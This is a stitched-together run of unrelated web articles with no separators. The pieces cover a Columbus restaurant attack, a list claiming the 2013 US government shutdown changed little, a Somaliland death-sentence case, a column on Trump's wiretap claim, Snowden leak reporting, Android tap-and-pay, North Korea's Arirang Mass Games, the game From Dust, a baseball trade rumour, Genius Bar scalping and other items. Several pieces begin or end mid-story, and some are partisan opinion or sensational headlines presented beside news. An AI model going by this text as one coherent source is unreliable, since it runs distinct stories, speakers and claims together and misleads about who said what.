Hany Baransi said, "I'm very fragile right now and I do want to be very careful about what I say."
Baransi's wife says her husband is still processing the violent attack and aftermath. Speaking to ABC 6/FOX 28's Steve Levine, she said her husband may still take some time away from the restaurant.
Hearing of Baransi's decision, Columbus Mayor Andrew Ginther told ABC 6/FOX 28 News that he intends to reach out to Baransi and support him.
Hundreds came out on Monday to show their support Baransi and the Nazareth Restaurant reopening for the first time since the attack. They offered donations for his business and his injured customers.
Michael Snyder
Activist Post
All of this whining and crying about a “government shutdown” is a total joke. You see, there really is very little reason why this “government shutdown” cannot continue indefinitely because almost everything is still running. 63 percent of all federal workers are still working, and 85 percent of all government activities are still being funded during this “shutdown”.
Yes, the Obama administration has been making a big show of taking down government websites and blocking off the World War II Memorial, but overall business in Washington D.C. is being conducted pretty much as usual.
It turns out that the definition of “essential personnel” has expanded so much over the years that almost everyone is considered “essential” at this point. In fact, this shutdown is such a non-event that even referring to it as a “partial government shutdown” would really be overstating what is actually happening. The following are 36 facts which prove that almost everything is still running during this government shutdown…
#1 According to U.S. Senator Rand Paul, 85 percent of all government activities are actually being funded during this “government shutdown”.
#2 Approximately 1,350,000 “essential” federal employees will continue to work during this “government shutdown”.
#3 Overall, 63 percent of the federal workforce will continue to work during this “government shutdown”.
#4 The U.S. Postal Service will continue to deliver our mail.
#5 U.S. military personnel will remain on duty and will continue to get paid.
#6 Social Security recipients will continue to get their benefits.
#7 Medicare recipients will continue to get their benefits.
#8 Medicaid recipients will continue to get their benefits.
#9 Food stamp recipients will continue to get their benefits.
#10 Those on unemployment will continue to get their benefits.
#11 Federal retirees will continue to get their pensions.
#12 The federal school lunch program has enough money to go through at least the end of this month.
#13 Public schools all over the country will continue to stay open.
#14 Almost all federal law enforcement officials will continue working.
#15 The Federal Reserve will remain “completely functional“.
#16 The Supreme Court will continue to operate normally and federal courts have enough money to keep going for at least two weeks.
#17 TSA employees will continue to molest travelers at our airports.
#18 Air traffic controllers will continue to monitor traffic at our airports.
#19 Hopelessly outmanned border patrol agents will continue to try to stem the tide of illegal immigration.
#20 Visas and passports will continue to be issued by the State Department.
#21 The Veterans Administration will continue to offer substandard medical services, and it will be able to continue processing benefit payments at least for now.
#22 The Obama administration apparently has plenty of money to spend on closing open-air memorials that are usually open to the public 24 hours a day.
#23 The Department of Defense announced the awarding of 94 new contracts worth a combined total of more than 5 billion dollars on September 30th – the day right before the “government shutdown”.
#24 The “government shutdown” has not prevented the new two billion dollar NSA spy center from opening up.
Download Your First Issue Free! Do You Want to Learn How to Become Financially Independent, Make a Living Without a Traditional Job & Finally Live Free?
Download Your Free Copy of Counter Markets
#25 Federal prisons will continue to operate normally.
#26 Amtrak trains will continue to run.
#27 The Patent and Trademark Office will be open.
#28 The Consumer Product Safety Commission will continue to issue product recalls if the products “create an immediate threat to the safety of human life“.
#29 The National Weather Service and the National Hurricane Center will continue to track weather patterns.
#30 If the federal government needs to respond to a natural disaster, this “shutdown” will not affect that.
#31 NASA will continue to support the Mars Rover and the two American astronauts up on the International Space Station.
#32 All city employees of the D.C. government have been deemed “essential” and will continue to go to work.
#33 Even though the Obamacare exchanges are not working properly, people will still be able to access them.
#34 The IRS will continue to collect taxes, but it will be suspending punitive audits of conservative organizations.
#35 Barack Obama will continue to get paid for the full duration of this “shutdown”.
#36 The U.S. Congress will continue to get paid for the full duration of this “shutdown”.
Of course not everything is operating normally during this government shutdown. Government parks are closed. The EPA and the Department of Energy have almost totally closed up shop. But overall, most Americans are not going to notice much of a difference.
And perhaps now is a good time for the American people to evaluate whether or not they actually need a gigantic federal government that wastes enormous mountains of our money.
For example, our federal government recently spent $98,670 to construct a single outhouse in Alaska.
Image copyright (C) British Broadcasting Corporation
A military court in Hargeisa, the capital of the self-proclaimed Somaliland, has sentenced 17 civilians to death for attacking a military base.
The death penalties were handed down the day after the attack in which seven people were killed, a Somaliland official told the BBC.
An armed group carried out the attack, claiming the military had built on land that they had owned for generations.
Somaliland has escaped much of the violence that plagues Somalia.
Swift case
A group of almost 30 armed civilians belonging to the same clan attacked soldiers in the camp on Tuesday, leading to a firefight in which three soldiers were killed, Somaliland's Defence Minister Ahmed Haji Ali told the BBC's Somali service.
After being arrested, 28 people were held overnight - and the military trial held the following day.
Five minors were also given life sentences, after seven people - including three soldiers - were killed, a Somaliland official told the BBC.
Three people were acquitted, and the trial of three others postponed because they had been injured during the fighting.
The civilians had confessed and an attack on Somaliland's military carries a mandatory death penalty for adults, the chairman of the military court, Yusuf Farah, told the BBC.
The BBC's Mohamed Mohamed says activists in Somaliland are likely to raise questions about the swiftness of the case - and whether the civilians had been properly represented.
If the death penalties are carried out, there could be a backlash from other members of the clan involved and they may even resort to violence, our correspondent says.
Land disputes are common and often complex in Somaliland, he adds.
Somaliland unilaterally declared independence in 1991 after the overthrow of Somali military dictator Siad Barre.
It is relatively stable and holds regular elections, which have seen peaceful transfers of power.
A prudent president, facing multiple battles on legislative and other priorities that are crucial to his first-year success, would find ways to avoid needless controversy. Not President Trump. He's doing exactly the opposite, and the credibility gap continues to grow.
The House Republican leadership's proposal to repeal and replace the Affordable Care Act, which Trump has embraced, faces serious opposition within the party. The president's newly proposed budget, which would slash domestic discretionary spending, the State Department and the Environmental Protection Agency, has been met with stiff resistance, even among some Republicans. The administration's second attempt to impose a travel ban is on hold, once again caught up in the courts.
Meanwhile, Trump will not let go of his claim that former president Barack Obama tapped his phones at Trump Tower during the election, despite no supporting evidence. The president has been offered numerous exit ramps to put this self-created controversy behind him. Instead, he remains stubbornly defiant, perpetuating rather than closing a damaging chapter in his presidency that in the past few days became an international embarrassment.
The latest illustration of the president's incapacity to admit error came Friday at a joint news conference with German Chancellor Angela Merkel. He was asked by German reporter Ansgar Graw of Die Welt about the angry denial by British officials that Britain, at the behest of the Obama administration, had spied on Trump during the presidential campaign.
“Do you think it was a mistake to blame British intelligence for this?” the president was asked. White House press secretary Sean Spicer had pointed to an unverified report about British intelligence a day earlier. Trump began his answer with what he hoped would be a lighthearted comment, but one nonetheless that suggested he didn't believe the British.
(Reuters)
Gesturing toward Merkel, he said, “As far as wiretapping, I guess, by this past administration, at least we have something in common, perhaps.” The president was referring to reports that the National Security Agency had listened in on the German chancellery during Obama's presidency.
Despite laughter in the East Room, Merkel appeared to find no humor in Trump's response, offering a look that charitably could be called one of puzzlement that the leader of the world's most powerful country would try to drag her into his controversy.
[Trump drags allies into the controversy over unproven claims]
Trump might have stopped there, but he plunged ahead. “And just to finish your question,” he told the German reporter, “we said nothing. All we did was quote a certain very talented legal mind who was the one responsible for saying that on television. I didn't make an opinion on it. That was a statement made by a very talented lawyer on Fox. And so you shouldn't be talking to me, you should be talking to Fox, okay?”
With that response, Trump was following a playbook that has become standard for his White House, which is to duck, deflect and in all other ways do everything but acknowledge that there is no credible evidence for Trump's original claim, tweeted out a few weeks ago. Having made the allegation, the president has asked others to prove it. When the evidence points in the opposite direction, the White House prefers to look for questionable ways to support what Trump claimed.
That was the case with Trump's words Friday. The “talented lawyer” to whom the president was referring was Andrew Napolitano, a former New Jersey Superior Court judge now working as a Fox News commentator. Napolitano was the originator of the assertion about the British role in the surveillance of Trump, basing what he said on three intelligence sources.
Spicer had cited Napolitano as he tried to defend his boss during an aggressively combative exchange with reporters Thursday. This is the same White House that has previously attacked accurate news stories that included the use of unnamed sources as fake news.
(Bastien Inzaurralde/The Washington Post)
Spicer's comments drew a swift and rare public rebuke from British intelligence, which called the claim “utterly ridiculous.” The dust up clearly strained tensions between the White House and America's closest ally. Meanwhile, Fox News declined to stand behind Napolitano's claims, noting Friday that its news team has found no evidence to support what the judge had said. That's one more case in which the White House has gone looking for a lifeline without success.
Day by day, the White House defense of Trump has been weakened, as one after another official has walked away from the president's tweets about Obama. The four leaders of the House and Senate intelligence committees have said they have seen no such evidence. FBI Director James B. Comey let it be known almost instantly two weeks ago that there was nothing to the claim.
Other elected officials, including Republicans, have demanded that the administration provide evidence. One Republican, Rep. Tom Cole (Okla.), said Friday that the president should apologize to Obama.
[House Intelligence Committee receives DOJ documents on wiretap claim]
In the face of this, Trump had nothing to say until pressed twice by German reporters, to their credit, at Friday's session with Merkel. Spicer has been thrust into the role of leading the defense at the risk of his credibility. He has sought to redefine the English language by suggesting Trump's words did not mean what the words meant, hoping to take some of the sting out of the implication in Trump's tweets that Obama had broken the law by ordering surveillance on Trump.
This chapter could come to an end this week. Comey is scheduled to testify Monday in an open session before the House Intelligence Committee about Russian hacking in the election and related matters. He will certainly be asked directly about Trump's allegation against Obama.
The Russia investigation on Capitol Hill remains open and vitally important. That the Russians meddled in the election is not disputed, given the weight of the intelligence community's findings. But much more needs to be known, and at this point, that responsibility falls to Congress.
One key aspect of that investigation is whether the Trump campaign or its close allies were in collusion with the Russians. That there were contacts between Trump officials and Russians also is not in dispute. Attorney General Jeff Sessions has acknowledged that he met with the Russian ambassador last fall, for example.
What is in dispute is whether those contacts were ordinary and legitimate, as the Sessions meeting was, or whether there were contacts between various Trump advisers and Russians that amounted to participation in a scheme to harm Hillary Clinton's campaign and thereby help Trump.
James R. Clapper Jr., the former director of national intelligence, said earlier this month on NBC's “Meet the Press,” that, at the time he left office in January, he had seen no evidence of collusion between the Trump team and the Russians. Spicer was particularly irritated Thursday that this fact has gotten far less attention than Trump's tweets about Obama as he repeatedly chided reporters during the briefing.
If Comey shoots down Trump's allegation about Obama illegally ordering surveillance on Trump Tower, how will Trump respond? In other words, what kind of proof, evidence or testimony would satisfy him that what he said took place did not take place?
Based on his performance Friday, he's not prepared to accept the word of those who should know. If he's doubling down in the face of outright denial from the British intelligence community about a claim he saw on Fox News, whose testimony here would satisfy him? And what will his defenders say then? This week should provide the answer to that, at least.
New York Times: U.S. May Never Know Extent Of Snowden Leaks
Basing its report on unnamed "senior government officials," The New York Times makes this stunning revelation today:
"American intelligence and law enforcement investigators have concluded that they may never know the entirety of what the former National Security Agency contractor Edward J. Snowden extracted from classified government computers before leaving the United States..."
Essentially, the paper goes on to report, former NSA contractor Edward Snowden exploited lower security standards at the NSA's Hawaii facility. That facility, the Times reports, had not yet been equipped with a system that would have notified supervisors that Snowden was accessing large numbers of highly classified documents.
Enlarge this image toggle caption Glenn Greenwald/Laura Poitras /EPA/LANDOV Glenn Greenwald/Laura Poitras /EPA/LANDOV
After six months of investigating, the NSA found that Snowden also covered his tracks by using the security credentials of other employees. Snowden, the Times reports, also hacked through firewalls protecting sensitive information.
Perhaps the highlight of the Times piece, however, is this quote from a "senior administration official:"
"They've spent hundreds and hundreds of man-hours trying to reconstruct everything he has gotten, and they still don't know all of what he took. I know that seems crazy, but everything with this is crazy."
The seriousness of the leak is perhaps best exemplified by two interviews that will air on CBS' 60 Minutes on Sunday.
Rick Ledgett, the man in charge of the Snowden leak task force, told the program that the U.S. should consider giving Snowden immunity in exchange for any documents he may still have in his possession.
"My personal view is, yes, it's worth having a conversation about," Ledgett said according to excerpts from the interview released on Friday. "I would need assurances that the remainder of the data could be secured, and my bar for those assurances would be very high. It would be more than just an assertion on his part."
Gen. Keith Alexander, the director of the NSA, told 60 Minutes he disagreed with Ledgett.
"I think people have to be held accountable for their actions," Keith said. "Because what we don't want is the next person to do the same thing, race off to Hong Kong and to Moscow with another set of data, knowing they can strike the same deal."
As Android 4.4/KitKat updates begin rolling out to devices on all the major US carriers, one frequently asked question has to do with whether or not these devices will include Android's new "Tap and Pay" feature. This was one of the major additions in KitKat and allows almost any device with an NFC chip to be used for "tap and go" mobile payments, even if said chip doesn't have a built-in secure element. This means that Google Wallet's tap and pay feature, which has historically been disabled on most Android devices save for carrier-independent Nexus/GPE devices, and select Sprint phones, will now work just fine regardless of device or carrier.
Unfortunately, there has been a lot of understandable fear that AT&T, Verizon, and T-Mobile may require this setting to be hidden, disabled, or removed altogether due to the fact that all three of them are pushing Isis Mobile Wallet, which is a direct competitor to Google Wallet. Thankfully, these fears seem unnecessary, at least so far. Now that we've seen KitKat roll out for some devices on all of the Isis carriers, it appears that this functionality is alive and well, and you're free to use Google Wallet if you choose.
Here are a list of devices that are confirmed to have the feature enabled and, by extension, have Google Wallet's mobile payment feature available:
HTC One (All Isis Carriers)
Moto X (All Isis Carriers)
Samsung Galaxy S4 (AT&T, KitKat update not yet available for T-Mobile and Verizon variants)
So far, the only device I can find with an official KitKat update that lacks "tap and pay" is the LG G2 on AT&T. Given that Ma Bell clearly doesn't seem to be blocking it, I'm inclined to believe that this falls on LG more than on the carrier. That said, we'll have to wait for the G2's KitKat update to roll out to Verizon and T-Mobile before we can conclusively say where to lay the blame.
Thanks, Craig B. and Aaron!
Mass gymnastics and artistic festival
The Grand Mass Gymnastics and Artistic Performance Arirang[1] (Chosŏn'gŭl: 아리랑 축제), also known as the Arirang Mass Games,[2] or the Arirang Festival[3] was a mass gymnastics and artistic festival held in the Rungrado May Day Stadium in Pyongyang, North Korea. The games usually took place in August or September. The games were held annually between 2002 and 2013, with the exception of 2006. After a five-year hiatus, mass games returned under the rubric The Glorious Country in 2018.
According to the Russian News Agency "TASS", "Arirang is a gymnastics and artistic festival, known as mass games. The extravaganza unfolds an epic story of how the Arirang nation of Korea, a country of morning calm, in the Orient put an end to the history of distress and rose as a dignified nation with the song 'Arirang'. The Arirang performance has been included in the Guinness Book of Records."[4]
History [ edit ]
A scene from the 2012 Arirang Festival
The name refers to "Arirang", a Korean folk story about a young couple who are torn apart by an evil landlord, here intended to represent the division of Korea.
The festival was held annually between 2002 and 2013, with the exception of 2006. The mass games were not held in 2014, 2015, 2016, and 2017.[5] In recent years, foreign tourists have been allowed to watch one of the many performances.[6]
The mass games returned after a five-year hiatus, taking place from 9 September through 30 September 2018. The new installment is called The Glorious Country (빛나는 조국).[7]
Iconography [ edit ]
The Mass Games possess an important ideological character praising the Workers' Party of Korea, its armed forces, Kim Il-sung and Kim Jong-il. These messages may not be clear to foreign spectators, who are not aware of North Korean iconography: a rising sun symbolizes Kim Il-sung. When a gun is shown, it signifies the gun which Kim Il-sung gave to his son Kim Jong-il. The colour red, particularly in flowers, stands for the working class, and the colour purple and red flowers represent Kim Il-sung (as the flower Kimilsungia is a purple orchid and the flower Kimjongilia is a red begonia). A snowy mountain with a lake represents Mount Paektu, where Kim Jong-il is said to have been born in a log cabin.
Participants [ edit ]
Arirang Festival in 2007
Arirang Festival in 2011
From as young as five years old, citizens are selected based on skill level to serve for the Arirang Festival for many years. In most cases this will be the way of life for them until retirement.[8] They are students of 8 schools of Pyongyang, each of them has its own colour. These are
서성 Seoseong (red and yellow)
평천 Pyeongcheon (green and white)
대동강 Daedonggang (blue and yellow)
모란봉 Moranbong (red and white)
보통강 Botonggang (blue and white)
만경대 Mangyeongdae (red and white)
대성 Daeseong (blue and white)
락랑 Rakrang (red and yellow)
Events [ edit ]
The opening event of the two-month festival are the mass games, which are famed for the huge mosaic pictures created by more than 30,000[9] well-trained and disciplined school children, each holding up coloured cards, in an event known in the West as a card stunt, accompanied by complex and highly choreographed group routines performed by tens of thousands of gymnasts and dancers.
World record [ edit ]
In August 2007, the Arirang Mass Games were recognised by Guinness World Records as the largest gymnastic display with 100,090 participants at the May Day Stadium in Pyongyang.[10]
See also [ edit ]
References [ edit ]
Further reading [ edit ]
Coordinates:
Equally, your own movements influence the entire simulation, and it's easy to be caught in strange little feedback loops as you scoop up mud to form a bridge only to discover that the mud you've used was actually holding back another body of water.
While the environment grows more elaborate, the basic toolset remains fairly constant. Don't worry, you'll unlock crazy new God skills like the ability to jellify water as the game progresses, but the simple power to grab and drop stuff remains surprisingly satisfying and thought-provoking over long periods of time.
With a 360 controller in your hands, it takes seconds to get used to – the stick controls your roving cursor, while the left trigger gathers up any substance you're currently hovering over and the right trigger dumps it – and such a simple interaction encourages you to really experiment with the materials at your disposal, yanking up huge dust clouds and then watching how they sag into slowly collapsing hills when you deposit them elsewhere, or pulling together angry red donuts of lava and then dropping them on foliage to see it erupt into flames.
Almost all puzzles have multiple solutions – if you're fending off lava, you can force ocean waves over it to turn it to stone, move sand around to direct its flow, or even cover it with magical jelly water in a manner that would make some Ph.D in a tweed coat over at the Open University choke on the end of their Biro – and because it's a genuine simulation, these solutions don't feel forced or overly prescribed.
From Dust takes elements from Populous and blends them with the physics-based gameplay of PixelJunk Shooter.
The simulation aspects might be the most fascinating part of this entire project, in fact, as Chahi's team creates a convincing environment built of fire, wind, earth and water, all constantly fighting for some kind of balance, and endlessly trapped within the same intriguing cycles.
Over the course of a level, it's not uncommon to discover that a volcano off to the side of the map has slowly created a new plain of rich black rock as the magma oozes into the ocean, for example, while I lost a couple of minutes just dumping sand into a shallow river and watching the way that little deltas and rivulets emerged and washed away again.
This is nature at double-speed, for sure, as channels forge canyons and volcanoes erupt and slip back into dormancy in a matter of seconds, but it's perfectly tweaked for messing around with, and once the campaign has been finished, Chahi's still left you with a wonderful digital fish tank to peer into.
There's a wonderful hollow didgeridoo sound as you pick up or dump materials.
As for the campaign itself, From Dust is shaping up to be a God game that feels uncommonly religious - albeit in an indistinct, cross-cultural non-denominational kind of way. The soundtrack blends rising organ blasts and pensive strings with the sounds of shells being clicked together, while your exit posts for each level resemble everything from Anasazi Kivas to the puttyish spiritual musings of Gaudi.
Fittingly, as with so much else in the game, this reverent tone seems to have emerged organically through the interaction of From Dust's various moving parts.
"It's funny, really, because we didn't want to take it in this direction," laughs Chahi. "There's a level early on in the game where you have to part a sea to get your tribe across, and you're basically playing as Moses. We really didn't want to have this kind of obvious thing in the game, but the game kept pushing us back to it.
"The crazy thing is that the religious aspects of this just emerged."
3:25pm: Texas is not embarking on a new endeavor to land Quintana, despite their longstanding interest, per Evan Grant of the Dallas Morning News. Two sources that spoke with him “downplayed the possibility of significant talks.”
As Grant suggests, one must consider the possibility that there's some gamesmanship at play. Chicago has been known to be fielding offers on Quintana for months, and the Astros — rumored to be one of the primary suitors for Quintana — are a division-rival of the Rangers and would assuredly hate to see the left-hander open the season in Arlington. Chicago has reportedly asked Houston for a hefty package containing right-handers Joe Musgrove and Francis Martes as well as outfielder Kyle Tucker in exchange for Quintana in the past, and Houston has seemingly been steadfast in its refusal to meet that price.
2:47pm: The Rangers have “suddenly increased their pursuit” of White Sox left-hander Jose Quintana, reports Bob Nightengale of USA Today Sports (Twitter link). He cautions that it's not clear if the Texas will ultimately be able to pull off a deal, though their emergence is nonetheless the first apparent step forward in the Quintana trade market in several weeks.
A pursuit of Quintana makes sense on paper for the Rangers, who lack clarity in the rotation behind Yu Darvish, Cole Hamels, Martin Perez and Andrew Cashner. Texas signed Tyson Ross to eventually pitch in the fifth slot of the rotation, but he's not likely to be ready to open the season. Beyond that, shifting to a six-man rotation later in the year could help keep not only Ross but the remainder of the rotation healthy. Darvish, in particular, has had recent injury woes, missing the 2015 campaign due to Tommy John surgery. Furthermore, Darvish is a free agent upon completion of the 2017 season, so adding Quintana would give the Rangers an affordable rotation piece that is controlled for three more seasons after Darvish is set to depart.
Certainly, there are obstacles to any Quintana trade. The Rangers, for one, have seen their once-vaunted farm system diminished in recent years by executing win-now trades for Hamels, Jonathan Lucroy, Jeremy Jeffress and Carlos Beltran, among others. While they once rated among the best minor league organizations in all baseball, the Rangers recently placed 15th on this week's rankings from ESPN's Keith Law (subscription required and recommended). That said, the team still has appealing young talent in both the minors and in the Majors. Law placed outfielder Leody Taveras, right-hander Ariel Jurado and lefty Yohander Mendez all in his top 75 prospects, and the big league roster has controllable pieces such as Nomar Mazara, Rougned Odor and, to a lesser extent, Jurickson Profar — any of whom could pique the interest of White Sox GM Rick Hahn and his staff. Slugging corner infielder Joey Gallo, too, has long seen his name bandied about trade rumors — especially since Adrian Beltre inked a two-year extension with the team last year.
It's also worth questioning exactly how Quintana would fit into the Rangers' plans from a financial standpoint. While the roughly $37MM that Quintana is owed over the next four seasons is eminently affordable for a pitcher of his caliber, multiple reports this offseason have suggested that Texas is nearly tapped out in terms of payroll. The Rangers are projected to enter the season with a $166MM payroll, which would represent a new franchise record.
Adding Quintana's $7MM salary to the ledger could be considered a stretch, although Texas has reportedly been trying to broker a one-year contract with Mike Napoli. If that's the case, it's hard to imagine that the team definitively cannot add another $7MM to its payroll — a deal for Napoli would figure to be in that range, at minimum — though perhaps Texas does not have the financial capital available to pull off both additions.
One also has to at least consider that the possibility that there's some gamesmanship at play on behalf of the White Sox in this scenario as well. Chicago has been known to be fielding offers on Quintana for months, and the Astros — rumored to be one of the primary suitors for Quintana — are a division-rival of the Rangers and would assuredly hate to see the left-hander open the season in Arlington. Chicago has reportedly asked Houston for a hefty package containing right-handers Joe Musgrove and Francis Martes as well as outfielder Kyle Tucker in exchange for Quintana in the past, and Houston has seemingly been steadfast in its refusal to meet that price.
Beijing Morning News reports that local ticket scalpers have found a new way to make money on Apple: booking up all available Genius Bar appointments and then offering them for sale online.
Ticket scalpers usually make their money by buying large quantities of event tickets as soon as they go on sale then illegally selling them for more than face value once the event is sold out. With Genius Bar appointments, they don't even need to fork out cash in the first place: they just use a bunch of email addresses to make the appointments then advertise them online.
Appointments sell for 10- yuan ($1.60-6.40) in a country where the average monthly salary is equivalent to $580. A Beijing Morning News reporter found there were no appointments available on the Apple site for iPhone, iPad or iPod. They contacted one of the advertisers asking for an appointment the next day and were offered a choice of two local stores and two time slots. The reporter was sent login details for the booking by instant messenger, and was then able to access the booking on the Apple site to change the details to their own.
The reporter contacted Apple for comment, but had not received a reply at the time of writing.
Thanks, Numble. NordVPN
Story highlights NBC will take on "Bye Bye Birdie Live" in 2017
Superstar Jennifer Lopez is set to star
(CNN) NBC has officially picked It's next live musical and the show's star. But it didn't have to look far.
that The network has announcedthat Jennifer Lopez will star in a live version of the Tony Award-winning musical "Bye Bye, Birdie" in 2017.
Lopez currently executive produces and stars in cop drama "Shades of Blue" on NBC.
NBC's production of "Bye Bye Birdie Live!" will be based on the 1960 Tony Award-winning Broadway musical that starred Dick Van Dyke as Albert Peterson and Chita Rivera as Rosie. Lopez will play Rosie.
NBC Entertainment Chairman Robert Greenblatt, who spearheaded the revival of the live network TV musical, announced the news Thursday during an event honoring him at the Paley Center for Media in Los Angeles.
Read More
I grew up in Cincinnati, OH and went to high school in Valencia, CA. With my best friend from high school, I went back East to attend Harvard College, where I worked hard, had a lot of fun and got involved in a variety of theatrical and cultural activities.
After graduation, with deferred admission to Harvard Law School, I went to New York to pursue acting, scared myself out of it and became a paralegal instead so I could figure out if I wanted to practice law at a big New York firm. Somehow being a paralegal didn't deter me, so I went back to Cambridge for law school and for the first time, really became politically active.
In law school I was involved with a variety of groups, including the Coalition for Civil Rights, which sued the law school for discriminatory hiring practices for their lack of any tenured female professors of color. Despite all that, they let me graduate and I joined the Boston firm of Widett, Slater & Goldman as a litigation associate. After an attempted merger and subsequent dissolution of the firm, someone asked me what I liked about law, and when I told them, they said: "You like acting in a courtroom. Go act!" I thought and prayed about it long and hard, then decided to pursue acting professionally. I got my SAG card in Boston and then moved back to New York (where I was also licensed to practice law), and did a lot of off-Broadway and regional theatre and toured internationally with the Gospel musical, “Mama, I Want to Sing!”
​
I realized with all my studying, I had not had a chance to study theatre full-time, so I auditioned for one-year programs in the U.K. and decide to go to The London Academy of Music and Dramatic Art for a classical theatre program. It was a great, rigorous program where I made a lot of life-long friends and learned a great deal about acting in general, and classical theatre in particluar. Once I finished the course, I returned to New York, but my best friend (yes, the same one from high school and college) convinced me to move out to Los Angeles, and that's where I am today!
I feel blessed and honored to be able to pursue my passion as my career and to be surrounded with friends, family, and my church family, all of whom nurture and encourage my numerous artistic pursuits. I thank and praise God for all He is doing and I'm looking forward to whatever is next!
​
Rajon Rondo continues to make progress in his ACL rehab, Boston Celtics president of basketball operations Danny Ainge said Thursday, but the All-Star point guard is "not close" and still needs to build strength in his right knee before he gets clearance to return to practice.
Making his weekly appearance on 98.5 The Sports Hub, a Boston radio station, Ainge detailed how Rondo is playing in competitive 2-on-2 situations, but still has a slight limp, suggesting that the surgically repaired knee is not healthy enough yet to take the next step in his rehab.
"I don't think he's close," said Ainge. "Meaning, I don't think [his return is] going to happen the next few weeks. We're not on pins and needles about it. We're being very cautious with Rondo. I think he's still got a little bit of a limp; his strength is not quite there, but he is making progress. We're not close."
Ainge said Rondo played 2-on-2 with teammates Phil Pressey, Courtney Lee and MarShon Brooks during Boston's off day Wednesday. Ainge said Rondo got upset when his team lost those 2-on-2 games and is clearly eager to get back on the floor with the Celtics.
"He's just not himself yet, but he's getting there and he's pushing himself to get there. Listen, we're going to be very cautious with him and make sure he's right before he comes back. There's just a little bit of a limp still. He's gotta get that strength back in the knee up to 100 percent before they'll let him back out on the court."
Rondo is planning to meet with his operating surgeon, Dr. James Andrews, in Florida this month to gauge where the guard is in his recovery. Ainge told the Boston Globe on Wednesday that the meeting would likely occur in the next 10-14 days. It seems Rondo and the team are waiting until they are confident that enough strength has returned to the knee in the hopes that Andrews will give the thumbs-up to resume full practice activities.
Ainge has previously said that Rondo could be back in game action as early as two weeks after gaining clearance to return to practice. That timeline suggests Rondo is unlikely to return in December.
Ancestry.com is out with a press release and a study this morning claiming that President Obama is descended from what they call the first ‘slave' in America. “President Barack Obama,” says the press release, “is the 11th great-grandson of John Punch, the first documented African enslaved for life in American history.” And the kicker is, at least as far as this study goes, that it's through his white mother.There are a lot of contingent claims in the study, done by Ancestry.com genealogist Joseph Shumway. The first is that an African man named John Punch became the first slave in 1640 — more on that in a moment.
Obama's mother Stanley Ann Dunham was descended from slave-owning Virginians and Shumway's argument is that Punch had children with a white woman who inherited her free status and eventually ‘passed' into the white population. He is thus the ancestor of the Dunhams. That's certainly not inherently implausible. There's a lot of African blood among Southern whites. Much more common was white men and black women, though in these very early decades race hierarchies weren't quite so nailed down.
Very few historians believe that the first ‘slave' in what would become the United States became a slave in 1640. But Shumway's argument is at least plausible. Here's why.
In the first few decades of settlement in North America there was little of the fixed distinction between indentured servant and ‘slave' — at least ‘slave' in the sense that later American history would understand it, which is permanent, heritable and tied to race. So the distinction was a bit more fluid in these early decades. But more importantly, the records we have seldom done us the favor of explicitly making the distinction.
Shumway notes that Punch was an “indentured servant in Colonial Virginia, [who] was punished for trying to escape his servitude in 1640 by being enslaved for life. This marked the first actual documented case of slavery for life in the colonies, occurring decades before initial slavery laws were enacted in Virginia.”
This is a strained argument — it's more about documentation than reality. But it may be true that this is the first explicit reference to lifetime slavery. There were relatively few Africans or slaves in Virginia before the 1660s and slavery only really began to take root in a big way late in the 17th century.
I'm inherently skeptical of any genealogical study put together by a company that is in the business of getting you to buy their genealogy hunting services. Ancestry.com has posted the details of its research here. I'm going to dig into them today. Take a look. Very curious to hear what you think.
The outgoing director of the CIA has warned of disastrous consequences if Donald Trump goes ahead with his threat of tearing up the US deal with Iran over nuclear weapons.
In an unusually frank interview with the BBC, John Brennan said Trump's opposition to the nuclear deal with Iran was the “height of folly”.
Speaking to BBC Radio 4's Today programme, Brennan said: “I think it would be disastrous, it really would: for one administration to tear up an agreement that a previous administration made would be almost unprecedented.”
Nuclear weapons: how foreign hotspots could test Trump's finger on the trigger Read more
Spelling out the dangers, the US intelligence chief added: “It could lead to a weapons programme inside of Iran that could lead other states in the region to embark on their own programmes with military conflict, so I think it would be the height of folly if the next administration were to tear up that agreement.”
Brennan also expressed alarm about many of the key foreign policy pledges made by Trump during his election campaign, including the president-elect's admiration for Vladimir Putin, his anti-Islamic rhetoric and his willingness to use torture.
He said that in Syria, Russia and the Assad regime were responsible for “wanton slaughter of civilians that is ... nothing short of outrageous”.
Brennan said he hoped for an improvement in relations between Washington and Moscow, but urged Trump to be careful of cosying up to Putin.
After the nuclear deal, the west should not disappoint Iranians for the third time | Saeed Kamali Dehghan Read more
He said: “Russia is a country that will pursue its national interests frequently to the detriment of the interests of the peoples of the countries wherein it operates. So I think President-elect Trump and the new administration need to be wary of Russian promises. Russian promises have not given us what it is they have pledged.”
He also warned Trump not to reintroduce waterboarding and other interrogation techniques as he has threatened. And he revealed that he would disobey orders if Trump ordered him to use waterboarding, and that most in the agency were also opposed.
He said: “I would counsel my successor not to go down that route any more. Without a doubt, the CIA really took some body blows as a result of its experiences in intention interrogation programme. And some that were very, very damaging to our reputation as well as to our officers. The overwhelming majority of CIA officers would not want to get back into that business.”
Asked about Trump's talk of the US being at war with radical Islam, Brennan said: “The new team needs to be disciplined in the language that they use, the messages that they send, because if they are not disciplined their language will be exploited by the terrorists and extremist organisations as a way to portray the United States and the government as being anti-Islamic, and we are not.”
He also cautioned against stepping up targeted assassinations using drones. He said: “I truly hope that the next administration understands their obligations, their responsibilities when they have these capabilities to be exceptionally judicious and prudent in carrying out these activities, because it can have tremendous positive advantages, but if it is used and misused in ways that increase the number of deaths as well as increases resentment against the United States it will not be beneficial to our national security interests. It will be counterproductive.”
Bengaluru Will Be A Dead City In 5 Years According to Scientists At Indian Institute Of Science
Bengaluru Will Be A Dead City In 5 Years According to Scientists At Indian Institute Of Science
Rampant urbanisation and invasive real estate growth are going to destroy Bengaluru's ecosystem, a study by Indian Institute of Science (IISc) recently revealed. According to the nummers, there's been 525% growth in built-up area in the last 40 years, corresponding to a 78% decline in vegetation, and an almost equivalent decline in water bodies.
newindianexpress
Bengaluru Lakes Are So Polluted They Are Catching Fire!
According to Prof T V Ramachandra of the Centre for Ecological Sciences the IISc, this sis “‘senseless growth”. "What's the point earning better when the food that you eat is adulterated? As a result of unplanned urbanisation, Bengaluru is going to be an unliveable and dead. city in the next five years," he told the Deccan Chronicle.
thehindu
Urban expert Ashwin Mahesh said that the Bangalore Development Authority (BDA) was to blame, for not creating a planned city: “The BDA has become an agency which facilitates land deals for the benefit of corrupt politicians. People feel it should be closed down,” he said.
Don't Miss 95.5 K SHARES 50.5 K SHARES 65.1 K SHARES 20.5 K SHARES 35.3 K SHARES
